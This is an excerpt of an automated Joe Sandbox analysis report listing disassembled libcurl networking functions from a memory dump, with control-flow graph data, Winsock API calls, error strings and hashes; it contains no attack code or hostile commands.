                                                                                                                                            • Opcode ID: e67708df3558e330293bbaf40da53f1ceb03cae9229949d697f2dcceb63fac2e
                                                                                                                                            • Instruction ID: 7dbaad22186d4256b56df1b4148969dee16d102de11b2d3df5d6cf3f4713e612
                                                                                                                                            • Opcode Fuzzy Hash: e67708df3558e330293bbaf40da53f1ceb03cae9229949d697f2dcceb63fac2e
                                                                                                                                            • Instruction Fuzzy Hash: 6DD18470A002198BEB658F29CA947EE77B5EF48710F104AFDF869D7290D778DA808F45
                                                                                                                                            Function 6B796EF0 Relevance: 12.5, APIs: 8, Instructions: 497COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 328 6b796ef0-6b796f1e 329 6b79747b-6b79748f call 6b7bdb71 328->329 330 6b796f24-6b796f2a 328->330 330->329 332 6b796f30-6b796f36 330->332 334 6b796f38-6b796f4a call 6b7bdb71 332->334 335 6b796f4b-6b796f51 332->335 337 6b796f69-6b796f71 335->337 338 6b796f53-6b796f68 call 6b7bdb71 335->338 341 6b796fcc-6b796fde call 6b799c30 337->341 342 6b796f73-6b796f89 call 6b798760 337->342 348 6b796fe8-6b796ffc 341->348 349 6b796fe0-6b796fe5 341->349 350 6b796f90-6b796f95 342->350 351 6b797002-6b79700a 348->351 352 6b7970e4-6b7970f9 348->352 349->348 353 6b796f9c-6b796fa3 350->353 354 6b796f97-6b796f9b 350->354 351->352 359 6b797010-6b797020 call 6b798760 351->359 357 6b7970ff-6b79710a 352->357 358 6b797203-6b797208 352->358 355 6b796faa-6b796fad 353->355 356 6b796fa5-6b796fa9 353->356 354->353 360 6b796faf-6b796fb5 355->360 361 6b796fb7-6b796fc4 355->361 356->355 362 6b797110-6b797129 357->362 363 6b7973fc-6b797401 358->363 364 6b79720e-6b797228 WSAWaitForMultipleEvents 358->364 381 6b797022-6b797037 359->381 360->350 360->361 361->342 368 6b796fc6-6b796fc9 361->368 366 6b79712b-6b79712e 362->366 367 6b797132-6b797148 362->367 371 6b797408-6b79740c 363->371 372 6b797403-6b797406 363->372 369 6b79722e 364->369 370 6b7972f1-6b7972f8 364->370 366->367 376 6b797159-6b79715c 367->376 377 6b79714a-6b797155 367->377 368->341 378 6b797231-6b79726b WSAEnumNetworkEvents 369->378 374 6b7973ed-6b7973f9 WSAResetEvent 370->374 375 6b7972fe-6b797306 370->375 379 6b79740e-6b797410 371->379 380 6b797452-6b797464 call 6b7bdb71 371->380 372->371 374->363 375->374 384 6b79730c 375->384 385 6b797169-6b79717d call 6b79fef0 376->385 386 6b79715e-6b797165 376->386 377->376 387 6b79726d-6b7972b9 378->387 388 6b7972c2-6b7972e5 WSAEventSelect 378->388 379->380 390 6b797412-6b79741b 379->390 382 6b797069 381->382 383 6b797039-6b79703b 381->383 394 6b79706b-6b797078 382->394 391 6b79705b-6b797067 383->391 392 6b79703d-6b797049 call 6b7a03a0 383->392 393 6b797310-6b797322 call 6b798760 384->393 412 6b7971cb-6b7971dc WSAEventSelect 385->412 413 6b79717f-6b79718b 385->413 386->385 387->388 396 6b7972bb-6b7972bf 387->396 388->378 398 6b7972eb-6b7972ee 388->398 390->380 399 6b79741d-6b797423 390->399 391->394 408 6b79704e-6b797058 392->408 420 6b797327-6b797331 393->420 403 6b79707a-6b79707c 394->403 404 6b7970a6-6b7970a9 394->404 396->388 406 6b7972c1 396->406 398->370 399->380 400 6b797425-6b797434 call 6b799c30 399->400 400->380 425 6b797436-6b79743b 400->425 410 6b79709f-6b7970a3 403->410 411 6b79707e-6b79708a call 6b7a03a0 403->411 414 6b7970ab-6b7970be WSAEventSelect 404->414 415 6b7970d1-6b7970db 404->415 406->388 408->391 410->404 429 6b79708f-6b79709c 411->429 418 6b7971e2-6b7971f4 412->418 419 6b797465-6b79747a call 6b7bdb71 412->419 422 6b79718d-6b797193 413->422 423 6b797196-6b7971a1 413->423 414->419 424 6b7970c4-6b7970cb 414->424 415->359 416 6b7970e1 415->416 416->352 418->362 426 6b7971fa-6b797200 418->426 427 6b7973da-6b7973e4 420->427 428 6b797337-6b79735d WSAEnumNetworkEvents 420->428 422->423 431 6b7971ac-6b7971b5 423->431 432 6b7971a3-6b7971a9 423->432 424->381 424->415 425->380 435 6b79743d-6b79743f 425->435 426->358 427->393 438 6b7973ea 427->438 436 6b79736a-6b79736c 428->436 437 6b79735f-6b797361 428->437 429->410 433 6b7971c0-6b7971c8 431->433 434 6b7971b7-6b7971bd 431->434 432->431 433->412 434->433 440 6b797441-6b797443 435->440 441 6b797445 435->441 443 6b7973b6-6b7973d4 WSAEventSelect 436->443 444 6b79736e-6b797370 436->444 442 6b797363-6b797365 437->442 437->443 438->374 440->441 445 6b797447-6b79744f call 6b7a04d0 440->445 441->445 442->436 446 6b797367 442->446 443->420 443->427 444->443 447 6b797372-6b797374 444->447 445->380 446->436 447->443 449 6b797376-6b797379 447->449 451 6b79737b-6b79738f call 6b7a03a0 449->451 452 6b797391-6b797399 449->452 451->452 457 6b7973b3 451->457 452->443 453 6b79739b-6b7973b1 call 6b7a03a0 452->453 453->443 453->457 457->443
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: bbb938bfea4aa102978a11d1e4c3043f8231df891a1e13ffca661760acd3119d
                                                                                                                                            • Instruction ID: 4114ba975a743fbb8a82d8621786003d5e3fd3a2feb195716e47c75e1440cf0c
                                                                                                                                            • Opcode Fuzzy Hash: bbb938bfea4aa102978a11d1e4c3043f8231df891a1e13ffca661760acd3119d
                                                                                                                                            • Instruction Fuzzy Hash: 58026E75E002199FEB00DFA8E981BAEB7B5FF48310F104179F965EB295E738E9018B50
                                                                                                                                            Function 6B772D20 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 409COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 477 6b772d20-6b772d68 478 6b772d80-6b772dc4 call 6b7ae5d0 477->478 479 6b772d6a 477->479 485 6b772dc6 478->485 486 6b772dc9-6b772dcc 478->486 480 6b772d6d-6b772d7f call 6b7bdb71 479->480 485->486 487 6b772de1-6b772de8 486->487 488 6b772dce-6b772dd1 486->488 491 6b772dee-6b772e34 call 6b7ae680 487->491 489 6b772dd3-6b772dd6 488->489 490 6b772ddf 488->490 489->491 492 6b772dd8-6b772ddd 489->492 490->487 495 6b7732c4-6b7732d2 call 6b7a05d0 491->495 496 6b772e3a-6b772e3c 491->496 492->487 502 6b7732d7-6b7732e7 call 6b7bdb71 495->502 496->495 498 6b772e42 496->498 500 6b772e44-6b772e46 498->500 501 6b772e4c-6b772e53 498->501 500->495 500->501 503 6b772e55-6b772e6f call 6b773f40 501->503 504 6b772e9a-6b772e9c 501->504 514 6b772e87-6b772e99 call 6b7bdb71 503->514 515 6b772e71-6b772e7a 503->515 505 6b772ea0-6b772eb5 504->505 508 6b773120 505->508 509 6b772ebb-6b772ed4 call 6b7a03a0 505->509 513 6b773126-6b77312a 508->513 522 6b772fcc-6b772fcf 509->522 523 6b772eda-6b772f28 call 6b7ae680 509->523 513->505 518 6b773130-6b773132 513->518 515->514 519 6b772e7c-6b772e84 call 6b774060 515->519 524 6b7732af 518->524 525 6b773138-6b77313f 518->525 519->514 530 6b772fd1-6b772fd7 522->530 531 6b772ff9-6b773011 call 6b774740 522->531 540 6b772f54-6b772f56 523->540 541 6b772f2a-6b772f30 523->541 528 6b7732b1-6b7732c3 call 6b7bdb71 524->528 525->524 526 6b773145-6b77314c 525->526 526->524 532 6b773152-6b773167 call 6b7746a0 526->532 530->531 536 6b772fd9-6b772fdb 530->536 547 6b773017 531->547 548 6b773185-6b7731d4 531->548 532->480 553 6b77316d-6b773174 532->553 536->508 542 6b772fe1-6b772ff7 call 6b774740 536->542 545 6b77301d-6b77301f 540->545 546 6b772f5c-6b772f63 540->546 549 6b772f32-6b772f38 541->549 550 6b772f3a-6b772f4f call 6b7a06b0 541->550 542->547 545->508 555 6b773025-6b773041 WSASetLastError 545->555 546->545 554 6b772f69-6b772fa6 call 6b7ae680 546->554 547->545 556 6b7731d6-6b7731e0 call 6b7728e0 548->556 557 6b7731eb-6b7731fe call 6b773f40 548->557 549->540 549->550 550->540 559 6b77322a-6b773231 553->559 560 6b77317a-6b773180 553->560 554->545 574 6b772fa8 554->574 555->508 562 6b773047-6b77308e call 6b788450 call 6b7aa0e0 call 6b7a06b0 555->562 556->557 557->502 577 6b773204-6b773206 557->577 565 6b773233-6b773239 559->565 566 6b77323b-6b773242 559->566 567 6b773252-6b773295 call 6b7aa0e0 call 6b7a05d0 560->567 596 6b773090-6b77309c 562->596 597 6b77309e-6b7730ae call 6b7bdb90 562->597 565->567 572 6b773244-6b77324a 566->572 573 6b77324c 566->573 567->528 592 6b773297-6b7732ae call 6b7bdb71 567->592 572->567 573->567 578 6b772fb2-6b772fca call 6b7746a0 574->578 579 6b772faa-6b772fb0 574->579 577->502 582 6b77320c-6b77320f call 6b774060 577->582 578->545 579->545 579->578 587 6b773214-6b773229 call 6b7bdb71 582->587 598 6b7730b3-6b7730ca 596->598 597->598 601 6b7730ec-6b773106 call 6b7746a0 598->601 602 6b7730cc-6b7730d1 598->602 608 6b773118-6b77311e 601->608 609 6b773108-6b773116 601->609 602->601 603 6b7730d3-6b7730da 602->603 605 6b7730e0-6b7730e3 603->605 605->601 607 6b7730e5-6b7730ea 605->607 607->601 607->605 608->513 609->508 609->608
                                                                                                                                            Strings
                                                                                                                                            • Failed to connect to %s port %ld: %s, xrefs: 6B77327D
                                                                                                                                            • After %I64dms connect time, move on!, xrefs: 6B772F3C
                                                                                                                                            • Connection time-out, xrefs: 6B7732C4
                                                                                                                                            • connect to %s port %ld failed: %s, xrefs: 6B773070
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: After %I64dms connect time, move on!$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                            • API String ID: 0-184998888
                                                                                                                                            • Opcode ID: 19eaa514da4c2d22f8a193677742f4b08b54691691142feb77b3cbbf02c7555d
                                                                                                                                            • Instruction ID: e0af3ae67b5f2359abee484de4ec0b20c18b728117876101f2f43b97fa924d26
                                                                                                                                            • Opcode Fuzzy Hash: 19eaa514da4c2d22f8a193677742f4b08b54691691142feb77b3cbbf02c7555d
                                                                                                                                            • Instruction Fuzzy Hash: CDF1E170A006049FDB31AF389E45BEEB3B5AF85319F0005F9F85D97251EB39AA81CB51
                                                                                                                                            Function 6B7A09F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 695 6b7a09f0-6b7a0a4e 696 6b7a0b1a-6b7a0b3c send 695->696 697 6b7a0a54-6b7a0a5f 695->697 699 6b7a0b3e-6b7a0b4c WSAGetLastError 696->699 700 6b7a0ba5-6b7a0bb7 call 6b7bdb71 696->700 697->696 698 6b7a0a65-6b7a0a68 697->698 701 6b7a0a6a-6b7a0a6c 698->701 702 6b7a0a72-6b7a0a80 call 6b7a03a0 698->702 703 6b7a0b69-6b7a0b9f call 6b7aa0e0 call 6b7a05d0 699->703 704 6b7a0b4e-6b7a0b68 call 6b7bdb71 699->704 701->696 701->702 710 6b7a0a85-6b7a0a8b 702->710 703->700 710->696 713 6b7a0a91-6b7a0a93 710->713 713->696 715 6b7a0a99-6b7a0a9d 713->715 717 6b7a0aeb 715->717 718 6b7a0a9f-6b7a0abc 715->718 719 6b7a0af1-6b7a0af3 717->719 724 6b7a0abe-6b7a0acf 718->724 725 6b7a0ad1-6b7a0aea call 6b7bdb71 718->725 720 6b7a0b13 719->720 721 6b7a0af5-6b7a0b0c recv 719->721 720->696 721->696 723 6b7a0b0e-6b7a0b11 721->723 723->696 724->719
                                                                                                                                            APIs
                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 6B7A0B04
                                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 6B7A0B2B
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B7A0B3E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastrecvsend
                                                                                                                                            • String ID: Send failure: %s
                                                                                                                                            • API String ID: 3418755260-857917747
                                                                                                                                            • Opcode ID: aa31e7f342a4cc39035776ac852bb35fe18f67bf31783c973f3005eee8d8b31f
                                                                                                                                            • Instruction ID: c4d660a4ac9fb2ae76d2b65ea75a4b630ae0ff6e1735f20dd51fa3ba2d8642c9
                                                                                                                                            • Opcode Fuzzy Hash: aa31e7f342a4cc39035776ac852bb35fe18f67bf31783c973f3005eee8d8b31f
                                                                                                                                            • Instruction Fuzzy Hash: 0D519C71A002199FDB60CF28CE41BAAB7F5EF05324F1046A9F969D7290D778A991CF90
                                                                                                                                            Function 6B7740C0 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 421networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 6b7740c0-6b774136 1 6b77413b-6b77414f 0->1 2 6b774138 0->2 3 6b774151-6b77415b 1->3 4 6b774160-6b77417a call 6b7bf070 1->4 2->1 3->4 7 6b7741af-6b7741c7 socket 4->7 8 6b77417c-6b7741ad call 6b797550 * 2 4->8 10 6b7741c9-6b7741cc 7->10 8->10 12 6b774512 10->12 13 6b7741d2-6b7741d9 10->13 14 6b774517-6b774527 call 6b7bdb71 12->14 15 6b7741e6-6b774210 call 6b772840 13->15 16 6b7741db-6b7741e3 call 6b79a660 13->16 26 6b774267-6b774288 call 6b7a06b0 15->26 27 6b774212-6b774266 call 6b7c1f49 * 2 call 6b7aa0e0 call 6b7a05d0 call 6b7728e0 call 6b7bdb71 15->27 16->15 33 6b77428f-6b774296 26->33 34 6b77428a-6b77428d 26->34 35 6b774300 33->35 36 6b774298-6b7742a6 33->36 34->33 34->35 38 6b774307-6b77432c 35->38 36->38 39 6b7742a8-6b7742d0 setsockopt 36->39 43 6b77432e-6b77433f call 6b7b4f30 38->43 44 6b774359-6b77435c 38->44 39->38 41 6b7742d2-6b7742fe WSAGetLastError call 6b7aa0e0 call 6b7a06b0 39->41 41->38 62 6b774341-6b77434b 43->62 63 6b77434d-6b774357 43->63 45 6b77435e-6b77437f getsockopt 44->45 46 6b7743a9-6b7743b0 44->46 50 6b774381-6b77438d 45->50 51 6b77438f-6b7743a3 setsockopt 45->51 52 6b7743b6-6b7743bd 46->52 53 6b774481-6b774488 46->53 50->46 50->51 51->46 52->53 59 6b7743c3-6b7743e6 setsockopt 52->59 57 6b7744c6-6b7744cf 53->57 58 6b77448a-6b7744bd call 6b797550 * 2 53->58 69 6b7744d6-6b7744fb call 6b78f0a0 call 6b7739a0 57->69 70 6b7744d1-6b7744d4 57->70 97 6b7744bf 58->97 98 6b774528-6b77452a 58->98 65 6b7743fc-6b774469 call 6b7b22a0 * 2 WSAIoctl 59->65 66 6b7743e8-6b7743f7 call 6b7a06b0 59->66 62->46 63->45 65->53 93 6b77446b-6b77447e WSAGetLastError call 6b7a06b0 65->93 66->53 75 6b77454c-6b774574 call 6b79a660 call 6b7ae5d0 69->75 90 6b7744fd-6b774510 call 6b7728e0 69->90 70->69 70->75 95 6b774576-6b77459e call 6b7969d0 * 2 75->95 96 6b7745a1-6b7745a8 75->96 90->12 90->14 93->53 95->96 103 6b7745ae-6b7745b5 96->103 104 6b77467b-6b774695 call 6b7bdb71 96->104 97->57 98->57 105 6b77452c-6b77454b call 6b7728e0 call 6b7bdb71 98->105 103->104 107 6b7745bb-6b7745c2 103->107 111 6b774604-6b774613 WSAGetLastError 107->111 112 6b7745c4-6b7745db connect 107->112 115 6b774615-6b77461a 111->115 116 6b774660-6b77467a call 6b7bdb71 111->116 112->111 118 6b7745dd-6b7745e5 112->118 120 6b774623-6b77465b call 6b7aa0e0 call 6b7a06b0 call 6b7728e0 115->120 121 6b77461c-6b774621 115->121 118->14 123 6b7745eb-6b774603 call 6b7bdb71 118->123 120->12 121->116 121->120
                                                                                                                                            APIs
                                                                                                                                            • socket.WS2_32(?,?,?), ref: 6B7741C1
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 6B7742C8
                                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B7742DE
                                                                                                                                            • getsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 6B774377
                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001001,00004020,00000004), ref: 6B7743A3
                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000000,00000004), ref: 6B7743DE
                                                                                                                                            • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000004,00000000,00000000), ref: 6B774461
                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000007), ref: 6B77446B
                                                                                                                                              • Part of subcall function 6B79A660: ioctlsocket.WS2_32(00000000,8004667E,TEwk), ref: 6B79A67A
                                                                                                                                              • Part of subcall function 6B7AE5D0: QueryPerformanceCounter.KERNEL32(6B79F03B,?,6B77669E,6B79F03B,?,?,?,?), ref: 6B7AE5E5
                                                                                                                                              • Part of subcall function 6B7AE5D0: __alldvrm.LIBCMT ref: 6B7AE5FE
                                                                                                                                              • Part of subcall function 6B7AE5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B7AE627
                                                                                                                                            • connect.WS2_32(00000000,?,?), ref: 6B7745D2
                                                                                                                                              • Part of subcall function 6B7969D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B796A0D
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B774604
                                                                                                                                            Strings
                                                                                                                                            • Trying %s:%ld..., xrefs: 6B774271
                                                                                                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 6B774235
                                                                                                                                            • @, xrefs: 6B77430C
                                                                                                                                            • Could not set TCP_NODELAY: %s, xrefs: 6B7742EB
                                                                                                                                            • Failed to set SO_KEEPALIVE on fd %d, xrefs: 6B7743E9
                                                                                                                                            • Immediate connect fail for %s: %s, xrefs: 6B77463A
                                                                                                                                            • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6B774473
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastsetsockopt$Unothrow_t@std@@@__ehfuncinfo$??2@$CounterIoctlPerformanceQuery__alldvrmconnectcurl_msnprintfcurl_mvsnprintfgetsockoptioctlsocketsocket
                                                                                                                                            • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                            • API String ID: 194311702-3868455274
                                                                                                                                            • Opcode ID: 51f49627f3a7f030609dab3e3330a57e9474e264c98a49239d770551d5b60576
                                                                                                                                            • Instruction ID: 1d32c93ba3fd901d978e0ec1e194c116d4807e0df63f846f7d693ae5886e37f1
                                                                                                                                            • Opcode Fuzzy Hash: 51f49627f3a7f030609dab3e3330a57e9474e264c98a49239d770551d5b60576
                                                                                                                                            • Instruction Fuzzy Hash: DEF18071940219AFEF20EF74DD89BAEB7B8EB05308F1001F6F519E6290D7799A809F51
                                                                                                                                            Function 6B7736A0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 211networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • getpeername.WS2_32(?,?,?), ref: 6B7736FE
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B773708
                                                                                                                                              • Part of subcall function 6B7AA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B7AA0E7
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B773772
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77377C
                                                                                                                                            Strings
                                                                                                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 6B7738A0
                                                                                                                                            • getpeername() failed with errno %d: %s, xrefs: 6B773724
                                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B773798
                                                                                                                                            • ssrem inet_ntop() failed with errno %d: %s, xrefs: 6B773801
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$curl_mvsnprintfgetpeernamegetsockname
                                                                                                                                            • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                            • API String ID: 673488319-670633250
                                                                                                                                            • Opcode ID: 484726761bfaf2850f9f7ae799309f59c71f6bae03a701454c7db971cca4aa46
                                                                                                                                            • Instruction ID: d69d74b4bb2394c2aa14fbb1f32f9da63042560f0b8aedafb35b39213af48cf2
                                                                                                                                            • Opcode Fuzzy Hash: 484726761bfaf2850f9f7ae799309f59c71f6bae03a701454c7db971cca4aa46
                                                                                                                                            • Instruction Fuzzy Hash: AD81C1759006089BDB21DF74C945BEBB3F8EF59304F1042AEF99DA7202EB357A858B50
                                                                                                                                            Function 6B7716D0 Relevance: 12.1, APIs: 8, Instructions: 79networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000C,6B7DB330,?), ref: 6B7716FA
                                                                                                                                              • Part of subcall function 6B776E10: getaddrinfo.WS2_32(?,?,?,6B7DB330), ref: 6B776E2E
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B771722
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B771728
                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6B77173B
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6B771749
                                                                                                                                            • send.WS2_32(?,?,00000001,00000000), ref: 6B771778
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B771782
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6B771790
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalErrorLastSection$Leave$Entercurl_msnprintfgetaddrinfosend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1592919352-0
                                                                                                                                            • Opcode ID: b9b25630b9adbc20a46c67bcc76c9b5f389d6dedccdff59db25f894c86d72a27
                                                                                                                                            • Instruction ID: 60e58b39a775d20278000450350006252ad3269c78da8a4c3faa218b5b7de208
                                                                                                                                            • Opcode Fuzzy Hash: b9b25630b9adbc20a46c67bcc76c9b5f389d6dedccdff59db25f894c86d72a27
                                                                                                                                            • Instruction Fuzzy Hash: 5D218B71500209ABDB20AFB5CD85BABB7F8EF49340F004939F666C3640EB35E9058BA0
                                                                                                                                            Function 6B7884A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 201COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
